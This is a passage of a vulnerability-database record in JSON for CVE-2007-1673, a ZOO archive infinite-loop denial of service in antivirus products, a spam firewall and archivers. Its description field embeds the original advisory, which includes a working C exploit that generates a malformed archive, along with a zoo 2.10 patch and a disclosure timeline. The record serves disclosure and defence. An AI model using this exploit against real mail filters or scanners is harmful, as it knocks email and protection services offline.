"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_home:4.7.844:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_professional:4.6.652:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_professional:4.6.665:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_professional:4.7.844:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_professional:4.7.844:*:windows:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_professional:4.7.869:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:rahul_dhesi:zoo:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "2.10",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:winace:winace:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_800:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_900:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avira:antivir_personal:7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avira:antivir_personal:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.3.0.5",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_home:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_home:4.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_home:4.7.1098:*:windows:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_home:4.7.827:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_professional:4.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_professional:4.6.603:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_professional:4.7.827:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_professional:4.7.827:*:windows:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2007-1673"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Jean-Sebastien Guay-Leroux is credited with discovering this issue.",
"sources": [
{
"db": "BID",
"id": "23823"
},
{
"db": "CNNVD",
"id": "CNNVD-200705-118"
}
],
"trust": 0.9
},
"cve": "CVE-2007-1673",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 6.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 7.8,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2007-1673",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 7.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-25035",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2007-1673",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200705-118",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-25035",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-25035"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001745"
},
{
"db": "NVD",
"id": "CVE-2007-1673"
},
{
"db": "CNNVD",
"id": "CNNVD-200705-118"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "unzoo.c, as used in multiple products including AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file. The Zoo compression algorithm is prone to a remote denial-of-service vulnerability. This issue arises when applications implementing the Zoo algorithm process certain malformed archives. \nA successful attack can exhaust system resources and trigger a denial-of-service condition. \nThis issue affects Zoo 2.10 and other applications implementing the vulnerable algorithm. Topic: Multiple vendors ZOO file decompression infinite\n loop DoS\n\nAnnounced: 2007-05-04\nCredits: Jean-Sebastien Guay-Leroux\nProducts: Multiple (see section III)\nImpact: DoS (99% CPU utilisation)\nCVE ID: CVE-2007-1669, CVE-2007-1670, CVE-2007-1671,\n CVE-2007-1672, CVE-2007-1673\n\n\nI. BACKGROUND\n\nZoo is a compression program and format developed by Rahul Dhesi in the mid\n1980s. The format is based on the LZW compression algorithm and compressed\nfiles are identified by the .zoo file extension. \n\n\nII. The vulnerability lies in the algorithm used to locate the\nfiles inside the archive. Each file in a ZOO archive is identified by a\ndirentry structure. Those structures are linked between themselves with a\n\u0027next\u0027 pointer. This pointer is in fact an offset from the beginning of\nthe file, representing the next direntry structure. By specifying an\nalready processed file, it\u0027s possible to process more than one time this\nsame file. The ZOO parser will then enter an infinite loop condition. \n\n\nIII. AFFECTED SOFTWARES\n\no Barracuda Spam Firewall\no Panda Software Antivirus\no avast! antivirus\no Avira AntiVir\no zoo-2.10\no unzoo.c\no WinAce\no PicoZip\n\n\nIV. IMPACT\n\nIf this attack is conducted against a vulnerable antivirus, the host system\nwill have its CPU at 100% utilization and may have problems answering other\nrequests. \n\nIf this attack is conducted against an SMTP content filter running a\nvulnerable ZOO implementation, legitimate clients may be unable to send and\nreceive email through this server. \n\n\nV. SOLUTION\n\no Barracuda Spam Firewall - CVE-2007-1669:\n They fixed this problem in virusdef 2.0.6399 for firmware \u003e= 3.4 and\n 2.0.6399o for firmware \u003c 3.4 March 19th 2007. \n\no Panda Software Antivirus - CVE-2007-1670:\n They fixed this problem April 2nd 2007. \n\no avast! antivirus - CVE-2007-1672:\n They fixed this problem in version 4.7.981, April 14th 2007. \n\no Avira AntiVir - CVE-2007-1671:\n They fixed this problem in avpack32.dll version 7.3.0.6 March 22th 2007. \n\no zoo-2.10 - CVE-2007-1669:\n This software is not maintained anymore. A patch for version 2.10 is\n provided in section VII of this advisory because some SMTP content\n filters may still use this software. \n\no unzoo.c - CVE-2007-1673:\n This software is not maintained anymore. No patch is provided for this\n software. \n\no WinAce was contacted but no response was received from them. \n\no PicoZip was contacted but no response was received from them. \n\n\nVI. PROOF OF CONCEPT\n\nUsing the PIRANA framework version 0.3.3, available at\nhttp://www.guay-leroux.com , it is possible to test your SMTP server\nagainst this vulnerability. \n\nAlternatively, here is an exploit that will create a file that will trigger\nthe infinite loop condition when it is processed. \n\n/*\n\nExploit for the vulnerability:\nMultiple vendors ZOO file decompression infinite loop DoS\n\ncoded by Jean-S\\xe9bastien Guay-Leroux\nSeptember 2006\n\n*/\n\n#include \u003cstdio.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003cstring.h\u003e\n\n// Structure of a ZOO header\n\n#define ZOO_HEADER_SIZE 0x0000002a\n\n#define ZH_TEXT 0\n#define ZH_TAG 20\n#define ZH_START_OFFSET 24\n#define ZH_NEG_START_OFFSET 28\n#define ZH_MAJ_VER 32\n#define ZH_MIN_VER 33\n#define ZH_ARC_HTYPE 34\n#define ZH_ARC_COMMENT 35\n#define ZH_ARC_COMMENT_LENGTH 39\n#define ZH_VERSION_DATA 41\n\n\n#define D_DIRENTRY_LENGTH 56\n\n#define D_TAG 0\n#define D_TYPE 4\n#define D_PACKING_METHOD 5\n#define D_NEXT_ENTRY 6\n#define D_OFFSET 10\n#define D_DATE 14\n#define D_TIME 16\n#define D_FILE_CRC 18\n#define D_ORIGINAL_SIZE 20\n#define D_SIZE_NOW 24\n#define D_MAJ_VER 28\n#define D_MIN_VER 29\n#define D_DELETED 30\n#define D_FILE_STRUCT 31\n#define D_COMMENT_OFFSET 32\n#define D_COMMENT_SIZE 36\n#define D_FILENAME 38\n#define D_VAR_DIR_LEN 51\n#define D_TIMEZONE 53\n#define D_DIR_CRC 54\n#define D_NAMLEN ( D_DIRENTRY_LENGTH + 0 )\n#define D_DIRLEN ( D_DIRENTRY_LENGTH + 1 )\n#define D_LFILENAME ( D_DIRENTRY_LENGTH + 2 )\n\n\nvoid put_byte (char *ptr, unsigned char data) {\n *ptr = data;\n}\n\nvoid put_word (char *ptr, unsigned short data) {\n put_byte (ptr, data);\n put_byte (ptr + 1, data \u003e\u003e 8);\n}\n\nvoid put_longword (char *ptr, unsigned long data) {\n put_byte (ptr, data);\n put_byte (ptr + 1, data \u003e\u003e 8);\n put_byte (ptr + 2, data \u003e\u003e 16);\n put_byte (ptr + 3, data \u003e\u003e 24);\n}\n\nFILE * open_file (char *filename) {\n\n FILE *fp;\n\n fp = fopen ( filename , \"w\" );\n\n if (!fp) {\n perror (\"Cant open file\");\n exit (1);\n }\n\n return fp;\n}\n\nvoid usage (char *progname) {\n\n printf (\"\\nTo use:\\n\");\n printf (\"%s \u003carchive name\u003e\\n\\n\", progname);\n\n exit (1);\n}\n\nint main (int argc, char *argv[]) {\n FILE *fp;\n char *hdr = (char *) malloc (4096);\n char *filename = (char *) malloc (256);\n int written_bytes;\n int total_size;\n\n if ( argc != 2) {\n usage ( argv[0] );\n }\n\n strncpy (filename, argv[1], 255);\n\n if (!hdr || !filename) {\n perror (\"Error allocating memory\");\n exit (1);\n }\n\n memset (hdr, 0x00, 4096);\n\n // Build a ZOO header\n memcpy (hdr + ZH_TEXT, \"ZOO 2.10 Archive.\\032\", 18);\n put_longword (hdr + ZH_TAG, 0xfdc4a7dc);\n put_longword (hdr + ZH_START_OFFSET, ZOO_HEADER_SIZE);\n put_longword (hdr + ZH_NEG_START_OFFSET,\n (ZOO_HEADER_SIZE) * -1);\n put_byte (hdr + ZH_MAJ_VER, 2);\n put_byte (hdr + ZH_MIN_VER, 0);\n put_byte (hdr + ZH_ARC_HTYPE, 1);\n put_longword (hdr + ZH_ARC_COMMENT, 0);\n put_word (hdr + ZH_ARC_COMMENT_LENGTH, 0);\n put_byte (hdr + ZH_VERSION_DATA, 3);\n\n // Build vulnerable direntry struct\n put_longword (hdr + ZOO_HEADER_SIZE + D_TAG, 0xfdc4a7dc);\n put_byte (hdr + ZOO_HEADER_SIZE + D_TYPE, 1);\n put_byte (hdr + ZOO_HEADER_SIZE + D_PACKING_METHOD, 0);\n put_longword (hdr + ZOO_HEADER_SIZE + D_NEXT_ENTRY, 0x2a);\n put_longword (hdr + ZOO_HEADER_SIZE + D_OFFSET, 0x71);\n put_word (hdr + ZOO_HEADER_SIZE + D_DATE, 0x3394);\n put_word (hdr + ZOO_HEADER_SIZE + D_TIME, 0x4650);\n put_word (hdr + ZOO_HEADER_SIZE + D_FILE_CRC, 0);\n put_longword (hdr + ZOO_HEADER_SIZE + D_ORIGINAL_SIZE, 0);\n put_longword (hdr + ZOO_HEADER_SIZE + D_SIZE_NOW, 0);\n put_byte (hdr + ZOO_HEADER_SIZE + D_MAJ_VER, 1);\n put_byte (hdr + ZOO_HEADER_SIZE + D_MIN_VER, 0);\n put_byte (hdr + ZOO_HEADER_SIZE + D_DELETED, 0);\n put_byte (hdr + ZOO_HEADER_SIZE + D_FILE_STRUCT, 0);\n put_longword (hdr + ZOO_HEADER_SIZE + D_COMMENT_OFFSET, 0);\n put_word (hdr + ZOO_HEADER_SIZE + D_COMMENT_SIZE, 0);\n memcpy (hdr + ZOO_HEADER_SIZE + D_FILENAME,\n \"AAAAAAAA.AAA\", 13);\n\n total_size = ZOO_HEADER_SIZE + 51;\n\n fp = open_file (filename);\n\n if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) {\n printf (\"The file has been written\\n\");\n } else {\n printf (\"Cant write to the file\\n\");\n exit (1);\n }\n\n fclose (fp);\n\n return 0;\n}\n\n\nVII. PATCH\n\nTo fix this issue, ensure that the offset of the next file to process is\nalways greater than the one you are currently processing. This will\nguarantee the fact that it\u0027s not possible to process the same files over\nand over again. Here is a patch for the software zoo version 2.10\ndistributed with many UNIX systems:\n\n\ndiff -u zoo/zooext.c zoo-patched/zooext.c\n--- zoo/zooext.c 1991-07-11 15:08:00.000000000 -0400\n+++ zoo-patched/zooext.c 2007-03-16 16:45:28.000000000 -0500\n@@ -89,6 +89,7 @@\n #endif\n struct direntry direntry; /* directory entry */\n int first_dir = 1;\n /* first dir entry seen? */\n+unsigned long zoo_pointer = 0; /* Track our position\nin the file */\n\n static char extract_ver[] = \"Zoo %d.%d is needed to extract %s.\\n\";\n static char no_space[] = \"Insufficient disk space to extract %s.\\n\";\n@@ -169,6 +170,9 @@\n exit_status = 1;\n }\n zooseek (zoo_file, zoo_header.zoo_start, 0); /* seek to where data\n begins */\n+\n+ /* Begin tracking our position in the file */\n+ zoo_pointer = zoo_header.zoo_start;\n }\n\n #ifndef PORTABLE\n@@ -597,6 +601,12 @@\n } /* end if */\n\n loop_again:\n+\n+ /* Make sure we are not seeking to already processed data */\n+ if (next_ptr \u003c= zoo_pointer)\n+ prterror (\u0027f\u0027, \"ZOO chain structure is corrupted\\n\");\n+ zoo_pointer = next_ptr;\n+\n zooseek (zoo_file, next_ptr, 0); /* ..seek to next dir entry */\n } /* end while */\n\ndiff -u zoo/zoolist.c zoo-patched/zoolist.c\n--- zoo/zoolist.c 1991-07-11 15:08:04.000000000 -0400\n+++ zoo-patched/zoolist.c 2007-03-16 16:45:20.000000000 -0500\n@@ -92,6 +92,7 @@\n int show_mode = 0; /* show file protection */\n #endif\n int first_dir = 1; /* if first direntry -- to\n adjust dat_ofs */\n+unsigned long zoo_pointer = 0; /* Track our position in the file\n*/\n\n while (*option) {\n switch (*option) {\n@@ -211,6 +212,9 @@\n show_acmt (\u0026zoo_header, zoo_file, 0); /* show\n archive comment */\n }\n\n+ /* Begin tracking our position in the file */\n+ zoo_pointer = zoo_header.zoo_start;\n+\n /* Seek to the beginning of the first directory entry */\n if (zooseek (zoo_file, zoo_header.zoo_start, 0) != 0) {\n ercount++;\n@@ -437,6 +441,11 @@\n if (verb_list \u0026\u0026 !fast)\n show_comment (\u0026direntry, zoo_file, 0, (char *) NULL);\n } /* end if (lots of conditions) */\n+\n+ /* Make sure we are not seeking to already processed data */\n+ if (direntry.next \u003c= zoo_pointer)\n+ prterror (\u0027f\u0027, \"ZOO chain structure is corrupted\\n\");\n+ zoo_pointer = direntry.next;\n\n /* ..seek to next dir entry */\n zooseek (zoo_file, direntry.next, 0);\n\n\nVIII. CREDITS\n\nJean-Sebastien Guay-Leroux found the bug and wrote the exploit for it. \n\n\nIX. REFERENCES\n\n1. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1669\n\n2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1670\n\n3. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1671\n\n4. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1672\n\n5. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1673\n\n\nX. HISTORY\n\n2006-09-?? : Vulnerability is found\n2007-03-19 : All vendors notified\n2007-03-19 : Barracuda Networks provided a fix\n2007-03-22 : Avira provided a fix\n2007-04-02 : Panda Antivirus provided a fix\n2007-04-14 : avast! antivirus provided a fix\n2007-05-04 : Public disclosure\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2007-1673"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001745"
},
{
"db": "BID",
"id": "23823"
},
{
"db": "VULHUB",
"id": "VHN-25035"
},
{
"db": "PACKETSTORM",
"id": "56479"
}
],
"trust": 2.07
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2007-1673",
"trust": 2.9
},
{
"db": "BID",
"id": "23823",
"trust": 2.0
},
{
"db": "SECUNIA",
"id": "25315",
"trust": 1.7
},
{
"db": "OSVDB",
"id": "36208",
"trust": 1.7
},
{
"db": "SREASON",
"id": "2680",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001745",
"trust": 0.8
},
{
"db": "XF",
"id": "34080",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20070504 MULTIPLE VENDORS ZOO FILE DECOMPRESSION INFINITE LOOP DOS",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-200705-118",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-25035",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "56479",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-25035"
},
{
"db": "BID",
"id": "23823"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001745"
},
{
"db": "PACKETSTORM",
"id": "56479"
},
{
"db": "NVD",
"id": "CVE-2007-1673"
},
{
"db": "CNNVD",
"id": "CNNVD-200705-118"
}
]
},
"id": "VAR-200705-0187",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-25035"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:12:33.864000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://amavis.org/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-001745"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-399",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-25035"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001745"
},
{
"db": "NVD",
"id": "CVE-2007-1673"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/23823"
},
{
"trust": 1.7,
"url": "http://www.amavis.org/security/asa-2007-2.txt"
},
{
"trust": 1.7,
"url": "http://osvdb.org/36208"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/25315"
},
{
"trust": 1.7,
"url": "http://securityreason.com/securityalert/2680"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/467646/100/0/threaded"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1673"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-1673"
},
{
"trust": 0.6,
"url": "http://www.barracudanetworks.com/ns/products/spam_overview.php"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/34080"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/467646/100/0/threaded"
},
{
"trust": 0.3,
"url": "http://www.avast.com"
},
{
"trust": 0.3,
"url": "http://www.avira.com/"
},
{
"trust": 0.3,
"url": "http://www.pandasoftware.com/"
},
{
"trust": 0.3,
"url": "http://www.picozip.com/"
},
{
"trust": 0.3,
"url": "http://www.winace.com/"
},
{
"trust": 0.3,
"url": "/archive/1/467646"
},
{
"trust": 0.3,
"url": "http://archives.math.utk.edu/software/multi-platform/gap/util/unzoo.c"
},
{
"trust": 0.1,
"url": "http://www.guay-leroux.com"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1671"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1672"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1669"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1670"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-25035"
},
{
"db": "BID",
"id": "23823"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001745"
},
{
"db": "PACKETSTORM",
"id": "56479"
},
{
"db": "NVD",
"id": "CVE-2007-1673"
},
{
"db": "CNNVD",
"id": "CNNVD-200705-118"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-25035"
},
{
"db": "BID",
"id": "23823"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001745"
},
{
"db": "PACKETSTORM",
"id": "56479"
},
{
"db": "NVD",
"id": "CVE-2007-1673"
},
{
"db": "CNNVD",
"id": "CNNVD-200705-118"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2007-05-09T00:00:00",
"db": "VULHUB",
"id": "VHN-25035"
},
{
"date": "2007-05-04T00:00:00",
"db": "BID",
"id": "23823"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-001745"
},
{
"date": "2007-05-04T16:51:04",
"db": "PACKETSTORM",
"id": "56479"
},
{
"date": "2007-05-09T01:19:00",
"db": "NVD",
"id": "CVE-2007-1673"
},
{
"date": "2007-05-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200705-118"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-16T00:00:00",
"db": "VULHUB",
"id": "VHN-25035"
},
{
"date": "2016-07-06T14:39:00",
"db": "BID",
"id": "23823"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-001745"
},
{
"date": "2018-10-16T16:40:28.443000",
"db": "NVD",
"id": "CVE-2007-1673"
},
{
"date": "2007-05-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200705-118"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200705-118"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "AMaViS Of multiple products used in unzoo.c Service disruption in (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-001745"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "resource management error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200705-118"
}
],
"trust": 0.6
}
}
Loading...
Loading...
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.